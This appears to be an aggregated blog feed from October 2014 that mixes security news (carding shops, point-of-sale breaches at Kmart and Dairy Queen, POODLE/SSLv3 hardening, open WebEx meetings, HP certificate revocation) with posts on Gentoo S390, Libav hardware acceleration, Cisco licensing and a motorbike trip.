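fixed=$(printf '%s\n' "$restored" | sed 's!/\.zfs/snapshot/snapshot-for-backup/!/!')
printf '%s\n' "$fixed"
# → /usr/jails/mydev/usr/home/dan/.ssh/authorized_keys
```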


The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

The 2pac[dot]cc credit card shop.
The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician. Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

“Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

2pac[dot]cc’s apologetic message to would-be customers of the credit card fraud shop.
IT’S ALL ABOUT CUSTOMER SERVICE

2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically every week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves amid so much choice is providing excellent customer service.

Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

Group-IB also listed stats on how many of Rescator’s cards turned out to be useful to cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 (about 28 percent) of the 151,720 Rescator cards that were sold on swiped1[dot]su came back as declined when run through the site’s checking service.

The swiped1[dot]su login page.
Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time. One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.


SSLv3 May Contain Traces of Bolts | 2014-10-14 23:03 UTC

UPDATE 2014-10-14 23:40 UTC The details have been published: meet the SSL POODLE attack.

UPDATE 2014-10-15 11:15 UTC Simpler server test method, corrected info about browsers

UPDATE 2014-10-15 16:00 UTC More information about client testing

El Reg posted an article earlier today about a purported flaw in SSL 3.0 which may or may not be real, but it’s been a bad year for SSL, we’re all on edge, and we’d rather be safe than sorry. So let’s take it at face value and see what we can do to protect ourselves. If nothing else, it will force us to inspect our systems and make conscious decisions about their configuration instead of trusting the default settings. What can we do?

The answer is simple: there is no reason to support SSL 3.0 these days. TLS 1.0 is fifteen years old and supported by every browser that matters and over 99% of websites. TLS 1.1 and TLS 1.2 are eight and six years old, respectively, and are supported by the latest versions of all major browsers (except for Safari on Mac OS X 10.8 or older), but are not as widely supported on the server side. So let’s disable SSL 2.0 and 3.0 and make sure that TLS 1.0, 1.1 and 1.2 are enabled.

What to do next

Test your server

The Qualys SSL Labs SSL Server Test analyzes a server and calculates a score based on the list of supported protocols and algorithms, the strength and validity of the server certificate, which mitigation techniques are implemented, and many other factors. It takes a while, but is well worth it. Anything less than a B is a disgrace.

If you’re in a hurry, the following command will attempt to connect to your server using SSL 3.0:

:|openssl s_client -ssl3 -connect www.example.net:443
If the last line it prints is DONE, you have work to do.
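To check several hosts in one go, the one-liner can be wrapped in a small script. This is a sketch under two assumptions: your OpenSSL build still accepts the -ssl3 flag (some newer builds drop legacy protocol support), and, as above, s_client prints DONE once the handshake succeeded and stdin is closed:

```shell
#!/bin/sh
# Classify captured s_client output: a completed SSLv3 handshake ends
# with DONE once stdin is closed, so its presence means SSLv3 is enabled.
verdict() {
  case "$1" in
    *DONE*) echo "SSLv3 ENABLED (fix your server)" ;;
    *)      echo "SSLv3 disabled" ;;
  esac
}

# Probe one host on port 443; a failed connection simply reads as "disabled".
probe() {
  out=$(: | openssl s_client -ssl3 -connect "$1:443" 2>/dev/null)
  printf '%s: %s\n' "$1" "$(verdict "$out")"
}

# Example (uncomment to run against a real host):
# probe www.example.net
```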

Fix your server

Disable SSL 2.0 and 3.0 and enable TLS 1.0, 1.1 and 1.2 and forward secrecy (ephemeral Diffie-Hellman).

For Apache users, the following line goes a long way:

SSLProtocol ALL -SSLv3 -SSLv2
It disables SSL 2.0 and 3.0, but does not modify the algorithm preference list, so your server may still prefer older, weaker ciphers and hashes over more recent, stronger ones. Nor does it enable forward secrecy.
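A fuller Apache sketch, combining the protocol line above with server-side cipher ordering to get forward secrecy; the cipher string is an illustrative choice of mine, not part of the original advice, so adapt it to your own requirements:

```apache
# Allow only TLS; SSLv2 and SSLv3 stay off.
SSLProtocol ALL -SSLv2 -SSLv3
# Enforce the server's preference order so that ephemeral (EC)DH suites,
# which provide forward secrecy, win over weaker client proposals.
SSLHonorCipherOrder on
SSLCipherSuite "EECDH+AESGCM:EDH+AESGCM:EECDH+AES:EDH+AES:!aNULL:!eNULL:!MD5:!RC4"
```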

The Mozilla wiki has an excellent guide for the most widely used web servers and proxies.

Test your client

The Poodle Test website will show you a picture of a poodle if your browser is vulnerable and a terrier otherwise. It is the easiest, quickest way I know of to test your client.

Qualys SSL Labs also have an SSL Client Test which does much the same for your client as the SSL Server Test does for your server; unfortunately, it is not able to reliably determine whether your browser supports SSL 3.0.

Fix your client

On Windows, use the Advanced tab in the Internet Properties dialog (confusingly not searchable by that name, search for “internet options” or “proxy server” instead) to disable SSL 2.0 and 3.0 for all browsers.

On Linux and BSD:

  • Firefox: open about:config and set security.tls.version.min to 1. You can force this setting for all users by adding lockPref("security.tls.version.min", 1); to your system-wide Mozilla configuration file. Support for SSL 3.0 will be removed in the next release.

  • Chrome: open the settings page and select “Show advanced settings”. You might expect an HTTP/SSL section that lets you disable SSL 3.0, but there is apparently no way to do so from the settings page. Support for SSL 3.0 will be removed in the next release.

I do not have any information about Safari and Opera. Please comment (or email me) if you know how to disable SSL 3.0 in these browsers.

Good luck, and stay safe.


Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to stop working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem, and we agreed that there's no point in keeping unmaintained, dead code in our repository anymore -- hence it's being removed.


One month in Turkey Ultrabug | 2014-10-14 20:35 UTC

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, roadworks)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)
Turkish customs are very friendly and polite; it's really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 km to our brave and astonishing Harley-Davidson Nightster. We encountered no problems at all with the bike, even though we clearly didn't go easy on her. We rode on gravel, dirt and mud without her complaining, not to mention the weight of our luggage and passengers.

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can't describe well enough the feeling of pleasure and freedom you get when travelling by motorbike, so I hope these first photos will give you an idea.

I have to admit that it's really impressive to leave your bike alone among the numerous trucks parking and loading/unloading their stuff a few centimeters from it.

We arrived in Piraeus easily; time to buy tickets for the next boat to Kos.

Kos is quite a big island that you can discover best by… riding around!

After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.

This is a view from the Bozburun bay. Two photos for two bike layouts: beach version and fully loaded version.

On the way to Cappadocia, near Karapinar:

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.


Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in email attacks targeting NATO, Ukrainian and Western government organizations, and firms in the energy sector.

More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today are available at this link.

Separately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice: once with IE and again using the alternative browser (e.g., Firefox or Opera). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

Otherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).


The July–September, 2014 Status Report is now available.


A big advantage of Cisco's remote-access VPN solution used to be that licensing was fairly simple and you did not have to pay per PC on which the AnyConnect client was installed. There were annoyances, of course, e.g. that AnyConnect Essentials and AnyConnect Premium could not be mixed.

With the current changes for the new AnyConnect 4, the latter becomes possible, but the overall license model gets considerably more complex. What changes:
There are three new license tiers:

  • Plus Subscription
  • Plus Perpetual
  • Apex Subscription
Subscription means that the license can be purchased with terms of one, three or five years. The licensing of the headend termination device (e.g. the ASA) is independent of this.
AnyConnect Plus includes the following features:

  • VPN
  • per-app VPN (new in v4)
  • Web Security for CWS and WSA
  • Network Access Manager
With the exception of the new “per-app VPN”, that looks pretty much like the existing feature set.
The new AnyConnect Apex license adds the following features:

  • Posture
    This existed before, but what is new is that the AnyConnect client can now also be used for ISE as of the upcoming version 1.3. The old NAC posture agent is no longer needed. This change has been overdue for a long time. Astonishing that at this year's Cisco Networkers a Cisco employee still told me it was not to be expected in the foreseeable future.
  • Next Generation Crypto / Suite B
    Plenty of words come to mind for companies that charge extra money for decent crypto. All of them, however, could affect the potential age rating of this site …
  • Clientless VPN
    What used to be licensed via AnyConnect Premium on the headend device now depends on the client license.
With the new AnyConnect, every client needs a license:

The number of Cisco AnyConnect licenses needed is based on all the possible unique users that may use any Cisco AnyConnect service. The exact number of Plus or Apex licenses should be based on the total number of unique users that require the specific services associated with each license type.

The smallest license tier now covers 25 clients. For my setup with two Macs, each running three VMs with XP/Win7/Win8, I already need eight licenses.
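Put as plain arithmetic (the numbers are just my setup, nothing from the ordering guide): every OS instance that runs the AnyConnect client counts as a unique user, so:

```shell
macs=2
vms_per_mac=3
# each Mac plus each VM on it runs the AnyConnect client once
licenses=$((macs + macs * vms_per_mac))
echo "$licenses"    # 8
```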

Something that was long overdue: different license types can now be mixed:

Cisco AnyConnect Apex and Plus licenses can be mixed in the same environment.
The number of Plus licenses can be smaller or greater than the number of Apex licenses.

License management may still bring us a few “challenges” …

When a Cisco ASA is used with Cisco AnyConnect, your product activation key (PAK) for Plus or Apex must be registered to the serial number of each individual Cisco ASA via the Cisco License Management portal.

How the handling will work in detail, especially in scenarios where one client connects to many different ASAs, remains to be seen. I hope there won't be any problems.

The full description of the new license model can be found in the Cisco AnyConnect Ordering Guide.


KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.

Department of Energy’s WebEx meetings.
At issue are recurring video- and audio conference-based meetings that companies make available to their employees via WebEx, a set of online conferencing tools run by Cisco. These services allow customers to password-protect meetings, but it was trivial to find dozens of major companies that do not follow this basic best practice and allow virtually anyone to join daily meetings about apparently internal discussions and planning sessions.

Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.

Some of the more interesting, non-password-protected recurring meetings I found include those from Charles Schwab, CSC, CBS, CVS, The U.S. Department of Energy, Fannie Mae, Jones Day, Orbitz, Paychex Services, and Union Pacific. Some entities even allowed access to archived event recordings.

Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.

“In the first week of October, we were contacted by a leading security researcher,” Cisco wrote. “He showed us that some WebEx customer sites were publicly displaying meeting information online, including meeting Time, Topic, Host, and Duration. Some sites also included a ‘join meeting’ link.”

Omar Santos, senior incident manager of Cisco’s product security incident response team, acknowledged that the company’s customer documentation for securing WebEx meetings had previously been somewhat scattered across several different Cisco online properties.  But Santos said the default setting for its WebEx meetings has always been for a password to be included on a meeting when created.

“If there is a meeting you can find online without a password, it means the site administrator or the meeting creator has elected not to include a password,” Santos said. “Only if the site administrator has elected to allow no passwords can the meeting organizer choose the ability to have no passwords on that meeting.”

Update, 11:24 a.m. ET: Cisco has published a blog post about this as well, available here.


Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there weren't any materials available for installing Gentoo on an S390 system without having to rely on an already installed distribution.

Thanks to Marist College, IBM and the Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Thanks also to the Debian project, since I based the materials on their procedure.

So over most of last year and in the last few weeks I've been polishing and finishing the documentation I had lying around. What I've documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both follow the same pattern.

Gentoo S390 on the Hercules emulator

This is probably the more interesting guide, because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, much like QEMU. However, QEMU, from what I can tell, is unable to emulate an S390 system on a non-S390 system, while Hercules can.

So if you want to have some fun emulating an S390 machine on your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules
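For orientation, a Hercules machine is defined by a small plain-text configuration file. The fragment below is an illustrative sketch only (directive values and device numbers are made up here, and the real file belongs in the wiki guide):

```
# hercules.cnf (illustrative sketch, not taken from the guide)
ARCHMODE  z/Arch            # emulate a 64-bit z/Architecture machine
MAINSIZE  1024              # main storage, in MiB
NUMCPU    1
OSTAILOR  LINUX             # tune panel messages for a Linux guest
0009      3215              # console device
0120      3390  gentoo.120  # DASD disk image for the Gentoo install
```

Starting the emulator is then just a matter of running hercules with that file (`hercules -f hercules.cnf`) from the directory holding the disk images.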

Gentoo S390 on z/VM

For those who have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo system working. Thanks to Dave Jones I was able to create the guide and test the release materials; he even gave a presentation at the 2013 VM Workshop! Link to the PDF. Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuild stage3s for s390, but we lacked a boot environment for installing Gentoo. This boot environment/release material is simply a kernel and an initramfs built with Gentoo's genkernel, based on busybox. It builds an environment using busybox like the livecd on amd64/x86 and other architectures. I've integrated the build of these boot environments into the autobuilds, so each week there should be an updated installation environment.

Have fun!



The second RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


VDD14 Discussions: HWAccel2 Luca Barbato | 2014-10-11 14:47 UTC

I took part in the Videolan Dev Days 14 a few weeks ago; sadly I have been too busy, so the posts about it will appear in scattered order and somewhat delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers to get pixels, or crunching pixels to get numbers. Most of the operations are quite time-consuming on a general-purpose CPU and orders of magnitude faster if done using a DSP or hardware designed for that purpose.

Availability

Most commonly used systems have video decoding and encoding capabilities, either embedded in the GPU or in separate hardware. Leveraging them spares lots of CPU cycles, and lots of battery if we are thinking about mobile.

Capabilities

Specialized hardware is usually inflexible, and that clashes with the fact that most codecs evolve quite quickly, with additional profiles extending their capabilities, supporting different color spaces, using additional encoding strategies and so on. Software decoders and encoders are still needed, and badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction, addressing short-term problems and not really documenting how to use it.

As a result, all the people who dared to use it had to guess, usually ended up using internal symbols they should not have needed, and all in all had to spend lots of time and endure plenty of grief when such internals changed.

Usage
Every backend required quite a large amount of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring the user to override get_format and get_buffer in specific ways.

Overall, to get the whole thing working, the library user was supposed to do about 75% of the work. Not really nice, considering people use libraries to abstract complexity and avoid repetition.

Backend support
As that support was written with only slice-based decoders in mind, it expects every backend to require the software decoder to parse the bitstream, prepare slices of the frame and feed them to the backend.

Sadly, new backends appeared that take either the bitstream or full frames directly; the approach so far had been to take the slice, add back the bitstream markers the backend library expects, and be done with it.

Initial HWAccel 2 discussion

Last year, since the backends I wanted to support were all bitstream-oriented and did not fit the model at all, I started thinking about it, and the topic got discussed a bit during VDD 13. Some people who had spent their dear time getting hwaccel1 working with their software were quite wary of radical changes, so a path of incremental improvements was more or less put down.

HWAccel 1.2
  • default functions to allocate and free the backend context, and a struct interfacing between Libav and the backend that is extensible without causing breakage.
  • avconv can now use some hwaccels, providing at least an example of how to use them and a means to test without having to gut VLC or mpv to experiment.
  • the old-style hwaccels are documented better, so at least some mistakes can be avoided (and some code that happens to work by sheer luck won't break once the faulty assumptions cease to exist).
The new VDA backend and the updated VDPAU backend are examples of it.

HWAccel 1.3
  • extend the callback system to decently fit bitstream-oriented backends.
  • provide an example of a backend directly providing normal AVFrames.
The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get closer to the end result: casual users should not have to write boilerplate code to get at least some performance boost from hwaccel, yet power users should keep full access to the underpinnings so they can get the most out of it without writing everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device, and the library will take care of everything. The frames returned by avcodec_decode_video2 will reside in normal system memory and use commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and so on will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to completely separate the hwaccel path from the software path, and that specific functions to hand over ownership of backend contexts and surfaces will be provided.

The software fallback won't be automagic anymore in this case; instead, a specific AVERROR_INPUT_CHANGED will be returned, so it will be cleaner for the user to reset the decoder without losing the display that may be sharing the same context. This leads the way to a simpler means of supporting multiple hwaccel backends and falling back from one to the other, and eventually to software decoding.

Migration path

We will try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 would generally result in fewer lines of code in the application; people wanting to keep their callbacks just need to set them after avcodec_open2 and move the pixel-specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make managing the backend-specific resources much simpler.

Expected Time of Arrival

Right now the review is on HWAccel 1.3. I hope to complete this step and add a few new backends to test how good (or bad) that API is before adding the other steps. HWAccel2 will probably take at least another 6 months.

Help in form of code or just moral support is always welcome!


Netflix on Gentoo Mike Pagano's Weblog | 2014-10-11 13:11 UTC

Contrary to some articles you may read on the internet, Netflix is working great on Gentoo.

Here’s a snapshot of my system running 3.12.30-gentoo sources and Google Chrome version 39.0.2171.19_p1.


$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

 



Sears Holding Co. late Friday said it recently discovered that point-of-sale registers at its Kmart stores were compromised by malicious software that stole customer credit and debit card information. The company says it has removed the malware from store registers and contained the breach, but that the investigation is ongoing.

“Yesterday our IT teams detected that our Kmart payment data systems had been breached,” said Chris Brathwaite, spokesman for Sears. “They immediately launched a full investigation working with a leading IT security firm. Our investigation so far indicates that the breach started in early September.”

According to those investigators, Brathwaite said, “our systems were infected with a form of malware that was currently undetectable by anti-malware systems. Our IT teams quickly removed that malware, however we do believe that debit and credit card numbers have been compromised.”

Brathwaite stressed that the data stolen included only “track 2” data from customer credit and debit cards, and did not include customer names, email addresses, physical addresses, Social Security numbers, PINs or any other sensitive information.

However, he acknowledged that the information stolen would allow thieves to create counterfeit copies of the stolen cards. So far, he said, Sears has no indication that the cards are yet being fraudulently used.

Sears said it has no indication that any Sears, Roebuck customers were impacted, and that the malware infected the payment data systems at Kmart stores only.

More on this developing story as updates become available. For now, see this notice on Kmart’s home page.


Nationwide fast-food chain Dairy Queen on Thursday confirmed that malware installed on cash registers at some 395 stores resulted in the theft of customer credit and debit card information. The acknowledgement comes nearly six weeks after this publication first broke the news that multiple banks were reporting indications of a card breach at Dairy Queen locations across the country.

In a statement issued Oct. 9, Dairy Queen listed nearly 400 DQ locations and one Orange Julius location that were found to be infected with the widely-reported Backoff malware that is targeting retailers across the country.

Curiously, Dairy Queen said that it learned about the incident in late August from law enforcement officials. However, when I first reached out to Dairy Queen on Aug. 22 about reports from banking sources that the company was likely the victim of a breach, the company said it had no indication of a card breach at any of its 4,500+ locations. Asked about the apparent discrepancy, Dairy Queen spokesman Dean Peters said that by the time I called the company and inquired about the breach, Dairy Queen’s legal team had indeed already been notified by law enforcement.

“When I told you we had no knowledge, I was being truthful,” Peters said. “However, I didn’t know at that time that someone [from law enforcement] had already contacted Dairy Queen.”

In answer to inquiries from this publication, Dairy Queen said its investigation revealed that the same third-party point-of-sale vendor was used at all of the breached locations, although it declined to name the affected vendor. However, multiple sources contacted by this reporter said the point-of-sale vendor in question was Panasonic Retail Information Systems.

In response to questions from KrebsOnSecurity, Panasonic issued the following non-denial statement:

“Panasonic is proud that we can count Dairy Queen as a point-of-sale hardware customer. We have seen the media reports this morning about the data breaches in a number of Dairy Queen outlets. To the best of our knowledge, these types of malware breaches are generally associated with network security vulnerabilities and are not related to the point-of-sale hardware we provide. Panasonic stands ready to provide whatever assistance we can to our customers in resolving the issue.”

The Backoff malware that was found on compromised Dairy Queen point-of-sale terminals is typically installed after attackers compromise remote access tools that allow users to connect to the systems over the Internet. All too often, the user accounts for these remote access tools are protected by weak or easy-to-guess username and password pairs.

The incident at DQ fits a pattern of breaches involving retail chains that rely heavily on franchisees and poorly-secured point-of-sale products which allow remote access over the Internet. On Sept. 24, nationwide sandwich chain Jimmy John’s confirmed reports first published in this blog about a likely point-of-sale breach at the company’s stores. While there are more than 1,900 franchised Jimmy John’s locations, only 216 were hit, and they were all running the same point-of-sale software from Newtown, Pa. based Signature Systems. On Sept. 26, Signature disclosed that at least 100 other mom-and-pop restaurants that it serves were compromised through its point-of-sale systems.

Earlier in September, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.

Dairy Queen said that it will be offering free credit monitoring services to affected customers. This has become the standard response for companies trying to burnish their public image in the wake of a card breach, even though credit monitoring services do nothing to help consumers detect or prevent fraud on existing accounts — such as credit and debit cards.

There is no substitute for monitoring your monthly bank and credit card statements for unauthorized or suspicious transactions. If you’re looking for information about how to protect yourself or loved ones from identity thieves, check out the tips in the latter half of this article.


Computer and software industry giant HP is in the process of notifying customers about a seemingly harmless security incident in 2010 that nevertheless could prove expensive for the company to fix and present unique support problems for users of its older products.

Earlier this week, HP quietly produced several client advisories stating that on Oct. 21, 2014 it plans to revoke a digital certificate the company previously used to cryptographically sign software components that ship with many of its older products. HP said it was taking this step out of an abundance of caution because it discovered that the certificate had mistakenly been used to sign malicious software way back in May 2010.

Code-signing is a practice intended to give computer users and network administrators additional confidence about the integrity and security of a file or program. Consequently, private digital certificates that major software vendors use to sign code are highly prized by attackers, because they allow those attackers to better disguise malware as legitimate software.
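At its core, code-signing is a private-key signature over a file that anyone holding the corresponding public key can verify. As a toy sketch of the mechanism (this has nothing to do with HP's or Microsoft's actual Authenticode tooling; the key and file names here are made up):

```shell
# create a throwaway RSA key pair (a stand-in for a vendor's signing certificate)
openssl genrsa -out vendor.key 2048 2>/dev/null
openssl rsa -in vendor.key -pubout -out vendor.pub 2>/dev/null

# "release" a file and produce a detached signature over it
echo 'binary payload' > driver.bin
openssl dgst -sha256 -sign vendor.key -out driver.bin.sig driver.bin

# anyone with the public half can check integrity and origin
openssl dgst -sha256 -verify vendor.pub -signature driver.bin.sig driver.bin
# prints: Verified OK
```

If an attacker can get malware signed with the private key, as happened in the incidents described here, verification succeeds for the malicious file too, which is exactly why stolen or misused signing keys are so valuable.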

For example, the infamous Stuxnet malware – apparently created as a state-sponsored project to delay Iran’s nuclear ambitions — contained several components that were digitally signed with certificates that had been stolen from well-known companies. In previous cases where a company’s private digital certificates have been used to sign malware, the incidents were preceded by highly targeted attacks aimed at stealing the certificates. In Feb. 2013, whitelisting software provider Bit9 discovered that digital certificates stolen from a developer’s system had been used to sign malware that was sent to several customers who used the company’s software.

